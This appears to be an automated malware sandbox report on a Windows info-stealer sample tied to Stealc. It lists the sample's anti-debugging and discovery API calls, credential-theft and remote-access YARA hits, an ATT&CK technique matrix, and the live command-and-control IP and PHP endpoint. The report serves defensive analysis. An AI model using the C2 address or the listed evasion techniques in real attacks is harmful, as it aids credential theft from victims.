                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022DB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_022DB5A1
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: mJXdkcP4Wx.exe PID: 3496, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_022D9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_022D9867
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_022D7DF7
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\mJXdkcP4Wx.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.mJXdkcP4Wx.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.mJXdkcP4Wx.exe.2310000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.mJXdkcP4Wx.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.mJXdkcP4Wx.exe.2310000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.mJXdkcP4Wx.exe.22c0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.mJXdkcP4Wx.exe.22c0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2338388103.0000000000793000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2081526955.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mJXdkcP4Wx.exe PID: 3496, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.mJXdkcP4Wx.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.mJXdkcP4Wx.exe.2310000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.mJXdkcP4Wx.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.mJXdkcP4Wx.exe.2310000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.mJXdkcP4Wx.exe.22c0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.mJXdkcP4Wx.exe.22c0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2338388103.0000000000793000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2081526955.0000000002310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mJXdkcP4Wx.exe PID: 3496, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Native API
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping2
                    System Time Discovery
                    Remote ServicesData from Local System1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    11
                    Virtualization/Sandbox Evasion
                    LSASS Memory41
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Disable or Modify Tools
                    Security Account Manager11
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection
                    NTDS11
                    Process Discovery
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                    Software Packing
                    DCSync1
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc Filesystem123
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    mJXdkcP4Wx.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://62.122.184.144/true
                      unknown
                      http://62.122.184.144/f88d87a7e087e100.phptrue
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://62.122.184.144/f88d87a7e087e100.phpjmJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://62.122.184.144/QmJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://62.122.184.144/f88d87a7e087e100.php8mJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://62.122.184.144/f88d87a7e087e100.phpHmJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://upx.sf.netAmcache.hve.4.drfalse
                                • URL Reputation: safe
                                unknown
                                http://62.122.184.144/f88d87a7e087e100.phprmJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://62.122.184.144/umJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://62.122.184.144mJXdkcP4Wx.exe, 00000000.00000002.2338388103.0000000000793000.00000004.00000020.00020000.00000000.sdmp, mJXdkcP4Wx.exe, 00000000.00000002.2338273179.000000000075E000.00000004.00000020.00020000.00000000.sdmptrue
                                      unknown
                                      http://62.122.184.144/f88d87a7e087e100.phpTmJXdkcP4Wx.exe, 00000000.00000002.2338388103.00000000007CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        62.122.184.144
                                        unknownunknown
                                        49120GORSET-ASRUtrue
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1529199
                                        Start date and time:2024-10-08 18:47:04 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 4m 59s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:20
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:mJXdkcP4Wx.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:be89dddee1630cde41b95d2df6070bd3.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@8/29@0/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 23
                                        • Number of non-executed functions: 180
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.89.179.12
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: mJXdkcP4Wx.exe
                                        TimeTypeDescription
                                        12:48:24API Interceptor1x Sleep call for process: WerFault.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        62.122.184.144ttFpxuMwKz.exeGet hashmaliciousStealcBrowse
                                        • 62.122.184.144/f88d87a7e087e100.php
                                        gMkw55jZRs.exeGet hashmaliciousStealcBrowse
                                        • 62.122.184.144/f88d87a7e087e100.php
                                        QmMKz5d4j7.exeGet hashmaliciousStealcBrowse
                                        • 62.122.184.144/f88d87a7e087e100.php
                                        c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exeGet hashmaliciousStealc, VidarBrowse
                                        • 62.122.184.144/f88d87a7e087e100.php
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        GORSET-ASRUttFpxuMwKz.exeGet hashmaliciousStealcBrowse
                                        • 62.122.184.144
                                        gMkw55jZRs.exeGet hashmaliciousStealcBrowse
                                        • 62.122.184.144
                                        QmMKz5d4j7.exeGet hashmaliciousStealcBrowse
                                        • 62.122.184.144
                                        c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exeGet hashmaliciousStealc, VidarBrowse
                                        • 62.122.184.144
                                        1.exeGet hashmaliciousRedLineBrowse
                                        • 62.122.184.51
                                        zJO55iLN3G.elfGet hashmaliciousUnknownBrowse
                                        • 31.40.39.14
                                        4VOPmuZZVV.exeGet hashmaliciousGoBrutBrowse
                                        • 62.122.184.95
                                        0Rae7oghna.elfGet hashmaliciousMiraiBrowse
                                        • 46.173.48.47
                                        PIyT9A3jfC.exeGet hashmaliciousPushdoBrowse
                                        • 62.122.190.121
                                        eQcKjYOV30.exeGet hashmaliciousPushdoBrowse
                                        • 62.122.190.121
                                        No context
                                        No context
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.9572176936284631
                                        Encrypted:false
                                        SSDEEP:192:2+/VBhuXhs0xu6c2juSZr+dozuiFLZ24IO8rc:JVBhuBx9c2jOqzuiFLY4IO8rc
                                        MD5:5A884BEF32191EDEFA4FF33F9F2056B7
                                        SHA1:F6AFC677FFD13AB47FB60D300A859FABA308E08C
                                        SHA-256:4EAFD84C5D285FF283EE583573BF3BD35ED13B9A93DF01EA149590E7CF6453F9
                                        SHA-512:BA8AEF8A0C0214FF1DA1B84743B8DD8CB03132C756167A5D5741988D533B9DCB7B44BC68CDF5E1153EFB256C34441A8BB13A34C671B623F422375A12ADCA5553
                                        Malicious:true
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.7.9.6.8.9.7.9.6.8.7.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.7.9.6.9.0.1.0.9.3.7.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.1.3.3.5.4.8.-.9.d.b.a.-.4.7.1.c.-.b.0.b.7.-.8.e.a.9.e.8.a.0.9.d.0.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.b.4.d.4.9.2.-.0.6.7.6.-.4.4.3.3.-.8.7.b.9.-.4.b.7.1.6.7.6.1.1.7.e.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.J.X.d.k.c.P.4.W.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.a.8.-.0.0.0.1.-.0.0.1.4.-.f.6.e.5.-.e.b.d.2.a.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.1.a.9.4.f.8.8.c.b.0.2.1.9.3.b.b.c.b.b.e.2.f.6.0.e.b.6.c.0.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.b.c.e.b.2.f.7.6.5.a.a.d.9.1.2.e.a.1.e.1.e.3.d.3.2.4.f.2.1.5.b.a.e.c.e.7.f.c.b.5.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....T.a.r.g.e.t.A.p.p.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.9181876934580382
                                        Encrypted:false
                                        SSDEEP:192:PVBhYXs056rgjuSZr+dwzuiFwZ24IO8+c:PVBhYX56rgjOizuiFwY4IO8+c
                                        MD5:869296268638F7F6C9E19723037B2DF8
                                        SHA1:DA17EF2C9F6F1E3B99E60495861CFD8CB59DAABE
                                        SHA-256:ED6A438A597906F6E64434E1C22C2D7FA10E166F5F9B1F5EB9F6DF28D4EFFEA3
                                        SHA-512:5E0E4AA506400FCAB83FEAB5FC3584E457EEA422340769562962BC95F92DC2716B581EA17DC51AD4AD101B4AC5B4FDB7354CFACFEDA09A3DBF63B00C213F4554
                                        Malicious:true
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.7.9.6.8.6.4.9.9.2.9.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.c.0.d.a.d.b.-.6.c.2.a.-.4.2.2.b.-.8.9.a.2.-.c.3.1.2.2.4.0.1.e.8.9.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.5.6.c.8.9.d.-.3.5.4.6.-.4.0.0.a.-.b.b.0.d.-.a.0.2.4.9.b.8.e.7.0.2.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.J.X.d.k.c.P.4.W.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.a.8.-.0.0.0.1.-.0.0.1.4.-.f.6.e.5.-.e.b.d.2.a.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.1.a.9.4.f.8.8.c.b.0.2.1.9.3.b.b.c.b.b.e.2.f.6.0.e.b.6.c.0.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.b.c.e.b.2.f.7.6.5.a.a.d.9.1.2.e.a.1.e.1.e.3.d.3.2.4.f.2.1.5.b.a.e.c.e.7.f.c.b.5.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.889429992371612
                                        Encrypted:false
                                        SSDEEP:192:tVBhwXs056rgjuSZr+3zuiFwZ24IO8+c:tVBhwX56rgjO3zuiFwY4IO8+c
                                        MD5:EADAC2813041808609B3029BCFC5AB69
                                        SHA1:BBFE61BA106C2A0DA42DED82934989FA0824FB50
                                        SHA-256:E07E741F6375673CD004A91FA5EB25174D175C9FE26416463EBDB10AF71E5E63
                                        SHA-512:56A0FBE16D62ED55C040119AF1DED4C4C3679B2607E4B2655CF75D389496AF140095DA4158E445410390BE4763E87B06D47D39FFBFCB524FFCF08A68B6C36B23
                                        Malicious:true
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.7.9.6.8.1.4.2.1.2.8.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.7.4.d.e.5.f.-.6.8.7.1.-.4.d.f.1.-.b.2.f.8.-.1.d.5.8.5.f.2.4.1.d.a.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.3.d.1.5.6.8.b.-.0.1.5.6.-.4.3.a.6.-.b.c.6.3.-.d.b.d.1.e.6.6.f.a.2.3.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.J.X.d.k.c.P.4.W.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.a.8.-.0.0.0.1.-.0.0.1.4.-.f.6.e.5.-.e.b.d.2.a.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.1.a.9.4.f.8.8.c.b.0.2.1.9.3.b.b.c.b.b.e.2.f.6.0.e.b.6.c.0.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.b.c.e.b.2.f.7.6.5.a.a.d.9.1.2.e.a.1.e.1.e.3.d.3.2.4.f.2.1.5.b.a.e.c.e.7.f.c.b.5.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.8898625407804479
                                        Encrypted:false
                                        SSDEEP:192:DpVBhJXs056rgjuSZr+3zuiFwZ24IO8+c:DpVBhJX56rgjO3zuiFwY4IO8+c
                                        MD5:2528E7DF8AED5DC1161B6F4D7E85E47E
                                        SHA1:2C11BB2A1A6D79413D0CAA72D76C9E75A41F1BE4
                                        SHA-256:CCC02343C0A7CF7E904FC5B0D7AA3C565A44F53EAD7BDDE1582BECFCF740B1F7
                                        SHA-512:89689BCCA5F9243B3EEEFED399C29B0B323AA443676116BB0D72E5AFB8574AD0A09241EAB045A731556711A8AF83A1F0FD2F5AC737BE8104BBE3D3DE47B257B1
                                        Malicious:true
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.7.9.6.8.2.4.0.7.4.1.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.4.b.f.1.0.4.-.b.5.5.e.-.4.e.9.0.-.9.5.4.6.-.8.a.0.5.7.1.6.5.5.4.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.5.1.9.9.5.6.-.0.6.0.8.-.4.1.c.c.-.8.3.b.4.-.2.6.b.a.5.4.d.1.8.7.0.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.J.X.d.k.c.P.4.W.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.a.8.-.0.0.0.1.-.0.0.1.4.-.f.6.e.5.-.e.b.d.2.a.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.1.a.9.4.f.8.8.c.b.0.2.1.9.3.b.b.c.b.b.e.2.f.6.0.e.b.6.c.0.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.b.c.e.b.2.f.7.6.5.a.a.d.9.1.2.e.a.1.e.1.e.3.d.3.2.4.f.2.1.5.b.a.e.c.e.7.f.c.b.5.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.9116315361364012
                                        Encrypted:false
                                        SSDEEP:192:flVBh8Xs056rgjuSZr+duzuiFwZ24IO8+c:flVBh8X56rgjO8zuiFwY4IO8+c
                                        MD5:BA7841E9709EB2AB2190E84344AEDF48
                                        SHA1:7F5486BFA3E99792A9D6CB6ABAF5D1097CAFA6FA
                                        SHA-256:C20F210463707213A05B4BF7D690D7B59D07E89AB0CE8AE90383DF834753BB79
                                        SHA-512:8E39AC6072CE4D02412765C9F2A9987EA7A476811A31490D86889E8C7C94F73EB0453A26ED9C4D2F453D6D2946FF908AF9D7D8BC2FEAAE9EB16F55D47E2256D6
                                        Malicious:true
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.7.9.6.8.5.2.9.6.6.3.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.2.f.5.a.1.0.-.e.a.d.3.-.4.9.6.c.-.9.8.6.f.-.9.1.5.6.3.6.f.2.7.7.2.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.1.7.0.9.7.a.e.-.5.3.3.d.-.4.9.1.1.-.a.4.1.5.-.3.e.d.3.3.2.4.7.a.9.6.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.J.X.d.k.c.P.4.W.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.a.8.-.0.0.0.1.-.0.0.1.4.-.f.6.e.5.-.e.b.d.2.a.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.1.a.9.4.f.8.8.c.b.0.2.1.9.3.b.b.c.b.b.e.2.f.6.0.e.b.6.c.0.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.b.c.e.b.2.f.7.6.5.a.a.d.9.1.2.e.a.1.e.1.e.3.d.3.2.4.f.2.1.5.b.a.e.c.e.7.f.c.b.5.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.m.J.X.d.k.c.P.4.W.x...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.8894235648542228
                                        Encrypted:false
                                        SSDEEP:192:b/mVBhVXs056rgjuSZr+3zuiFwZ24IO8+c:aVBhVX56rgjO3zuiFwY4IO8+c
                                        MD5:81EDA43FE9B06F5BC36FCE94D1D609EC
                                        SHA1:516C1A6345FAA01172B10B062D0135E6B1379A28
                                        SHA-256:44748B5F660D6F5653DDDF5230ED5981B7E917ABC5F2B1EEFAEB704755D9B75B
                                        SHA-512:FA49F9295DA27332502C9478BDDC523BF3494D9CDF53FF3C58A2081910D23DC462180EA0758108A467BA79BF5A77FE0AC3B44D91C8420366E09348B6A90E9D38
                                        Malicious:true
